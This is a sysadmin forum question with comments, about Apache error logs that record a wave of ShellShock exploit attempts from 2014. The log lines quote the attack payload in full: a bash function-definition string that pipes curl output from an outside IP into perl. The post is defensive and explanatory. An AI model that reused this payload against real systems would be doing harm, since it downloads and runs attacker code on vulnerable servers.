1

Typically my apache error logs get hit with a large volume of the typical 'phpmyadmin' (requests and a huge qty of spelling variations), wordpress admin, joomla and a whole load more.

But last night my server got hit with an unusually high volume of a new type:

[Mon Oct 27 20:22:58 2014] [error] [client 46.105.118.179] File does not exist: /var/www/details.cgi, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl

And 

[Mon Oct 27 20:22:59 2014] [error] [client 46.105.118.179] script not found or unable to stat: /usr/lib/cgi-bin/zml.cgi, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | p$

They all are after slight variations of the above two.

Has anyone else seen this? What are they after? Are there any extra security precautions that I might be able to put in place for such attacks?

John
  • 887
  • 4
  • 15
  • 25
  • 2
    At first glance that looks like a client/bot unsuccessfully trying to exploit the ShellShock bugs in (non-existent) CGI scripts. – HBruijn Oct 28 '14 at 12:14
  • Ah ok, thanks for the tip. I will have a dig around on this issue and see what i find. – John Oct 28 '14 at 14:05
  • https://www.google.com/search?q=http%3A%2F%2F202.143.160.141%2Flib21%2Findex.cgi&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a&channel=rcs shows a few more people are being hit with this. As @HBrujin notes, it's trying to run a command on your server that connects to the hacker's server, which will show your server is vulnerable. –  Oct 28 '14 at 17:33

0 Answers0